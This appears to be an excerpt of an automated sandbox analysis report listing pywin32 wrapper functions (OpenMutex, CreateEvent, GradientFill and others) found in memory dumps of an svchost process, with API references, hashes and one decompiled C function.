                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Arg_FreeParseTupleU_devicemode
                            • String ID: CreateDC$OOO
                            • API String ID: 4215554973-1504344346
                            • Opcode ID: 6021f038c9d9ea1aa9c713612e19be16fb422b2c0643e73da246633d3daabb6b
                            • Instruction ID: 8efa4891296dec07f105a3ebba7668f377946b07c1f727aa2b22702686891674
                            • Opcode Fuzzy Hash: 6021f038c9d9ea1aa9c713612e19be16fb422b2c0643e73da246633d3daabb6b
                            • Instruction Fuzzy Hash: A2215371508306AFEB00AF28DD45B6B7BB9EF80704F448A25F944D2161F731D96A9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91A60, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 77COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:OpenMutex,?,?,?), ref: 6DA91A93
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA91AA9
                            • PyErr_Occurred.PYTHON38 ref: 6DA91AB9
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DA91AD0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OiO:OpenMutex$OpenMutex
                            • API String ID: 1011514818-2659930528
                            • Opcode ID: 20f6249259288c5aa31684f31f9f678cb15becd1140717757824bc18ead6fd70
                            • Instruction ID: bd26038ea8185d78aa69c34462fb3909fd4580b32096c3b622f4ee570fbc3d24
                            • Opcode Fuzzy Hash: 20f6249259288c5aa31684f31f9f678cb15becd1140717757824bc18ead6fd70
                            • Instruction Fuzzy Hash: 2221283551C3016FDB005B6CCC08BAF7BF9EF89365F548825F964C51A0EB7584568B4A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91970, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 77COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:OpenEvent,?,?,?), ref: 6DA919A3
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA919B9
                            • PyErr_Occurred.PYTHON38 ref: 6DA919C9
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DA919E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OiO:OpenEvent$OpenEvent
                            • API String ID: 1011514818-3927525858
                            • Opcode ID: 63b17382be8fc5c1bc16d9750d1a26980b9a29159970c173e75220e878a24f70
                            • Instruction ID: 591f4060798dcf416b36bd5e2a1b39a337cfb3ee8f86a8edc320f0c94e100e37
                            • Opcode Fuzzy Hash: 63b17382be8fc5c1bc16d9750d1a26980b9a29159970c173e75220e878a24f70
                            • Instruction Fuzzy Hash: AC21D63511C3016FDB005B68CC08BBF7BF8EF89355F548925F865862A1EB75C4668B46
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91C40, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 77COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:OpenWaitableTimer,?,?,?), ref: 6DA91C73
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA91C89
                            • PyErr_Occurred.PYTHON38 ref: 6DA91C99
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DA91CB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OiO:OpenWaitableTimer$OpenWaitableTimer
                            • API String ID: 1011514818-2876122181
                            • Opcode ID: 446b5d4bd752d46f750404d3763cf1144220b8993ac83a8c0759c10816897a30
                            • Instruction ID: f1f1308c7b882836db9f47f58ee989fafb243b7a0e837a4b22f91f5783d32163
                            • Opcode Fuzzy Hash: 446b5d4bd752d46f750404d3763cf1144220b8993ac83a8c0759c10816897a30
                            • Instruction Fuzzy Hash: 2521253551C3016FEB005B2CCC08BAE7BF8EFC9369F54C525F965C62A0EB7480668B4A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91B50, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 77COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:OpenSemaphore,?,?,?), ref: 6DA91B83
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA91B99
                            • PyErr_Occurred.PYTHON38 ref: 6DA91BA9
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DA91BC0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OiO:OpenSemaphore$OpenSemaphore
                            • API String ID: 1011514818-2232966109
                            • Opcode ID: 6e2628deef32145633770aa86cf53fe10dba21b83637ce13f5add1a7949c232a
                            • Instruction ID: 7de2fa3b5a57fa8c01f8e004dd108b2ec125c88970f85fe7470895eaea38b061
                            • Opcode Fuzzy Hash: 6e2628deef32145633770aa86cf53fe10dba21b83637ce13f5add1a7949c232a
                            • Instruction Fuzzy Hash: 7021067511C3016FDB005B68CC08BAE7BF9FF89359F548525F964852A1FB7480968B86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA5DD0, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 200COMMON
                            Download Yara Rule
                            APIs
                            • PyUnicode_AsUTF8.PYTHON38(?), ref: 6DAA5DD4
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Unicode_
                            • String ID: hCursor$hIcon$hInstance$hbrBackground$lpfnWndProc$lpszClassName$lpszMenuName
                            • API String ID: 2646675794-1275132375
                            • Opcode ID: 91ccdc449c14f59bdb00ba931d7841b3a329903898317254b1bde2edb4c2548e
                            • Instruction ID: 9cab739b7799fa2b095929182e801fccfb9ce819930e9d77931ba38b6131679d
                            • Opcode Fuzzy Hash: 91ccdc449c14f59bdb00ba931d7841b3a329903898317254b1bde2edb4c2548e
                            • Instruction Fuzzy Hash: B951947979E1825FD7158B3494607BA7BF2AF53244B9C86A9D8C6CB622E323CC818704
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAA1C0, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                            Download Yara Rule
                            C-Code - Quality: 20%
                            			E6DAAA1C0(void* __ecx, intOrPtr _a8) {
				char _v4;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char* _t27;
				char* _t29;
				void* _t32;
				void* _t36;
				void* _t37;
				intOrPtr* _t39;
				void* _t40;
				void* _t41;
				void* _t45;
				intOrPtr _t46;
				void* _t53;
				void* _t55;
				void** _t58;
				void** _t59;
				void** _t60;

				if( *0x6dac7ca4 != 0) {
					_v32 = 0;
					_t41 = 0;
					_v36 = 0;
					_t27 =  &_v24;
					_t46 = 0;
					__imp__PyArg_ParseTuple(_a8, "OOOk:GradientFill", _t27,  &_v20,  &_v16,  &_v28, _t45, _t40);
					_t58 =  &(( &_v36)[6]);
					if(_t27 == 0) {
						L4:
						return 0;
					} else {
						_t29 =  &_v4;
						__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v24, _t29);
						_t59 =  &(_t58[2]);
						if(_t29 != 0) {
							_t32 = E6DAA9F60( &_v32, _v20,  &_v32,  &_v8);
							_t55 = _v32;
							_t60 =  &(_t59[3]);
							if(_t32 != 0) {
								_t36 = E6DAAA040( &_v36, _v16, _v28,  &_v36,  &_v12);
								_t60 =  &(_t60[4]);
								if(_t36 == 0) {
									_t41 = _v36;
								} else {
									__imp__PyEval_SaveThread();
									_t41 = _v36;
									_t37 =  *0x6dac7ca4(_v4, _t55, _v8, _t41, _v12, _v28);
									_t53 = _t37;
									__imp__PyEval_RestoreThread(_t36);
									_t60 =  &(_t60[1]);
									if(_t53 != 0) {
										 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
										_t46 = __imp___Py_NoneStruct;
									} else {
										__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GradientFill", _t53);
										_t60 =  &(_t60[2]);
										_t46 = 0;
									}
								}
							}
							if(_t55 != 0) {
								free(_t55);
								_t60 =  &(_t60[1]);
							}
							if(_t41 != 0) {
								free(_t41);
							}
							return _t46;
						} else {
							goto L4;
						}
					}
				} else {
					_t39 = __imp__PyExc_NotImplementedError;
					__imp__PyErr_Format( *_t39, "%s is not available on this platform", "GradientFill");
					return _t39;
				}
			}



























                            0x6daaa1ca
                            0x6daaa1f0
                            0x6daaa1fd
                            0x6daaa204
                            0x6daaa209
                            0x6daaa20d
                            0x6daaa219
                            0x6daaa21f
                            0x6daaa224
                            0x6daaa23c
                            0x6daaa243
                            0x6daaa226
                            0x6daaa226
                            0x6daaa22f
                            0x6daaa235
                            0x6daaa23a
                            0x6daaa254
                            0x6daaa259
                            0x6daaa25d
                            0x6daaa262
                            0x6daaa276
                            0x6daaa27b
                            0x6daaa280
                            0x6daaa2d8
                            0x6daaa282
                            0x6daaa282
                            0x6daaa28c
                            0x6daaa2a0
                            0x6daaa2a7
                            0x6daaa2a9
                            0x6daaa2af
                            0x6daaa2b4
                            0x6daaa2ce
                            0x6daaa2d0
                            0x6daaa2b6
                            0x6daaa2bc
                            0x6daaa2c2
                            0x6daaa2c5
                            0x6daaa2c5
                            0x6daaa2b4
                            0x6daaa280
                            0x6daaa2e4
                            0x6daaa2e7
                            0x6daaa2e9
                            0x6daaa2e9
                            0x6daaa2ee
                            0x6daaa2f1
                            0x6daaa2f3
                            0x6daaa2ff
                            0x00000000
                            0x00000000
                            0x00000000
                            0x6daaa23a
                            0x6daaa1cc
                            0x6daaa1cc
                            0x6daaa1dd
                            0x6daaa1e9
                            0x6daaa1e9

                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,GradientFill), ref: 6DAAA1DD
                            • PyArg_ParseTuple.PYTHON38(?,OOOk:GradientFill,?,?,?,?), ref: 6DAAA219
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAA22F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatObject_ParseTupleU_object@@
                            • String ID: %s is not available on this platform$GradientFill$GradientFill$OOOk:GradientFill
                            • API String ID: 3520361810-1172515067
                            • Opcode ID: 5fe1ae43046583c825b2a75278822275a878e97658ff9b56d2d73207d27e3ecc
                            • Instruction ID: fa89287a7fc49a01dacd64b9a0685ed3f1b87e326ba23cdbee69a2a32239cd71
                            • Opcode Fuzzy Hash: 5fe1ae43046583c825b2a75278822275a878e97658ff9b56d2d73207d27e3ecc
                            • Instruction Fuzzy Hash: 4631C4B140C305AFD7019F55CC80E6B7BFDFF89254F084629F94592121E736DAAA8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA65E0, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_SetString.PYTHON38(6E28EDB0,can't delete LOGFONT attributes), ref: 6DAA65F6
                            • PyUnicode_AsUTF8.PYTHON38(?), ref: 6DAA6609
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,?), ref: 6DAA6656
                            • PyErr_Format.PYTHON38(6E28ED94,lfFaceName must be less than %d characters,00000020), ref: 6DAA6678
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAA6682
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_Object_$FormatFreeStringU_object@@Unicode_
                            • String ID: $can't delete LOGFONT attributes$lfFaceName$lfFaceName must be less than %d characters
                            • API String ID: 3257253911-602829194
                            • Opcode ID: ecdfd226fa954b1178b61e4eec91bbc07001a02defb46b92403c148759118983
                            • Instruction ID: 8a72a4620ca713c3e4c25f4b4e5afe57f8de4280febc0e466e3ac7a5a14ea3c5
                            • Opcode Fuzzy Hash: ecdfd226fa954b1178b61e4eec91bbc07001a02defb46b92403c148759118983
                            • Instruction Fuzzy Hash: A421E13210C2019FCB005F28DD88BA67BB5EF06215F0C4765F551872A1E722C8A59B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAC539, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 82COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_Format.PYTHON38(6E28ED94,Don't supply a param for SPI_GETNONCLIENTMETRICS,?,?,?,?,?,?,?,000001F4), ref: 6DAAC4FE
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000014), ref: 6DAAC547
                            • PyErr_Format.PYTHON38(6E2925BC,Action %d is not supported yet,?), ref: 6DAAC936
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAC963
                            Strings
                            • Unable to allocate %d bytes, xrefs: 6DAAC563
                            • +, xrefs: 6DAAC56D
                            • Don't supply a param for SPI_GETMINIMIZEDMETRICS, xrefs: 6DAAC580
                            • SystemParametersInfo, xrefs: 6DAAC651
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_Format$freemalloc
                            • String ID: +$Don't supply a param for SPI_GETMINIMIZEDMETRICS$SystemParametersInfo$Unable to allocate %d bytes
                            • API String ID: 475777474-1663439386
                            • Opcode ID: cd612171dc87842ea94af92794a6faec64440e841503faf9b0e9435d5a885469
                            • Instruction ID: 457966bba55bab3a80848f3bdf516f21876fec9a7575b6ac72456bcb8333abfc
                            • Opcode Fuzzy Hash: cd612171dc87842ea94af92794a6faec64440e841503faf9b0e9435d5a885469
                            • Instruction Fuzzy Hash: D121937850C302DFEB018F18CC84A6A7BB4BB86305F0C8B69F54183261D732C5AA9B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAC4AC, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 80COMMON
                            Download Yara Rule
                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,000001F4), ref: 6DAAC4B9
                            • PyErr_Format.PYTHON38(6E28ED94,Don't supply a param for SPI_GETNONCLIENTMETRICS,?,?,?,?,?,?,?,000001F4), ref: 6DAAC4FE
                            • PyErr_Format.PYTHON38(6E2925BC,Action %d is not supported yet,?), ref: 6DAAC936
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAC963
                            Strings
                            • Don't supply a param for SPI_GETNONCLIENTMETRICS, xrefs: 6DAAC4F2
                            • ), xrefs: 6DAAC4DF
                            • SystemParametersInfo, xrefs: 6DAAC651
                            • Unable to allocate %d bytes, xrefs: 6DAAC4D5
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_Format$freemalloc
                            • String ID: )$Don't supply a param for SPI_GETNONCLIENTMETRICS$SystemParametersInfo$Unable to allocate %d bytes
                            • API String ID: 475777474-1221699255
                            • Opcode ID: d3faa3b696f8a4eebe0204c606408ff6dae3761d61b59eabd0e06e7f589cf1d6
                            • Instruction ID: c5b243124af858cd8f017501ea11dbdc8725323698c02547f95f17ea033fe0dc
                            • Opcode Fuzzy Hash: d3faa3b696f8a4eebe0204c606408ff6dae3761d61b59eabd0e06e7f589cf1d6
                            • Instruction Fuzzy Hash: A821947850C3029FEB018F18DC84A6A7BB5FB86305F088769F551C7221D731D9AADB53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91420, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 76threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiO:CreateEvent,?,?,?,?), ref: 6DA91458
                            • ?PyWinObject_AsSECURITY_ATTRIBUTES@@YAHPAU_object@@PAPAU_SECURITY_ATTRIBUTES@@H@Z.PYWINTYPES38(?,?,00000001), ref: 6DA91476
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000001,00000001,00000000), ref: 6DA91490
                            • PyEval_SaveThread.PYTHON38 ref: 6DA9149F
                            • CreateEventW.KERNEL32(?,?,?,?), ref: 6DA914B7
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA914C0
                            • ?PyWinObject_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(00000000), ref: 6DA914D3
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DA914DF
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Eval_Thread$Arg_CreateEventFreeFromParseRestoreSaveTuple
                            • String ID: CreateEvent$OiiO:CreateEvent
                            • API String ID: 2153353669-721273015
                            • Opcode ID: 0572ff3d6adfa6c0be362ad268e111e05b95b60f5d375cda3e5ae7f8af1f48e7
                            • Instruction ID: 8eb5c1aba9220015075e3ff6d9c367751c68234d8239f24ae03c41cf18b3b264
                            • Opcode Fuzzy Hash: 0572ff3d6adfa6c0be362ad268e111e05b95b60f5d375cda3e5ae7f8af1f48e7
                            • Instruction Fuzzy Hash: 4421E575018301ABDB009F58CC08BAB7BF8FF89359F448429F864C52A1EB71C0668B96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91600, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 76threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OllO:CreateSemaphore,?,?,?,?), ref: 6DA91638
                            • ?PyWinObject_AsSECURITY_ATTRIBUTES@@YAHPAU_object@@PAPAU_SECURITY_ATTRIBUTES@@H@Z.PYWINTYPES38(?,?,00000001), ref: 6DA91656
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000001,00000001,00000000), ref: 6DA91670
                            • PyEval_SaveThread.PYTHON38 ref: 6DA9167F
                            • CreateSemaphoreW.KERNEL32(?,?,?,?), ref: 6DA91697
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA916A0
                            • ?PyWinObject_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(00000000), ref: 6DA916B3
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DA916BF
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Eval_Thread$Arg_CreateFreeFromParseRestoreSaveSemaphoreTuple
                            • String ID: CreateSemaphore$OllO:CreateSemaphore
                            • API String ID: 677282856-2215705474
                            • Opcode ID: f8d3b60242c28269b98da339f8f203adb87612df07e389fdb202f1809ecff45e
                            • Instruction ID: 5b72caf5fa652b6ae95e486ef4da5ddce6bdbc47ca9d1e020ac5472b8623c9e9
                            • Opcode Fuzzy Hash: f8d3b60242c28269b98da339f8f203adb87612df07e389fdb202f1809ecff45e
                            • Instruction Fuzzy Hash: 5121F435518301AFDB009F18CC08BAB7FF8FF89355F448829F964C51A1EB71C0698B9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA6880, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 76COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOO|O,?,?,?,6E294CE8), ref: 6DAA68A7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA68BD
                            • PyCallable_Check.PYTHON38(?), ref: 6DAA68CE
                            • PyErr_SetString.PYTHON38(6E28ED8C,The 3rd argument must be callable), ref: 6DAA68E7
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAA6903
                            • Py_BuildValue.PYTHON38(6DAC2720,?,?), ref: 6DAA691F
                            • EnumFontFamiliesW.GDI32(?,?,Function_00006780,00000000), ref: 6DAA6938
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6DAA694A
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAA6957
                            • PyLong_FromLong.PYTHON38(00000000), ref: 6DAA695E
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Arg_BuildCallable_CheckDeallocEnumErr_FamiliesFontFreeFromLongLong_ParseStringTupleValue
                            • String ID: OOO|O$The 3rd argument must be callable
                            • API String ID: 3822935182-2869722672
                            • Opcode ID: 41f43b4133e59ce380f03cbbb615f1ab0d749e739c909088d6ceba7a42824665
                            • Instruction ID: 6ca00d189cfc3094867b63e81c8fcf6b5acd55fd91eb4566e7fbf8d5d91554a9
                            • Opcode Fuzzy Hash: 41f43b4133e59ce380f03cbbb615f1ab0d749e739c909088d6ceba7a42824665
                            • Instruction Fuzzy Hash: DF21923140C302AFDB019F18CC45A6B7BB8FF45215F484629F995C1271E731D9AACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA916F0, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 73threadtimeCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:CreateWaitableTimer,?,?,?), ref: 6DA91723
                            • ?PyWinObject_AsSECURITY_ATTRIBUTES@@YAHPAU_object@@PAPAU_SECURITY_ATTRIBUTES@@H@Z.PYWINTYPES38(?,?,00000001), ref: 6DA91741
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000001,00000001,00000000), ref: 6DA9175B
                            • PyEval_SaveThread.PYTHON38 ref: 6DA9176A
                            • CreateWaitableTimerW.KERNEL32(?,?,?), ref: 6DA9177E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA91787
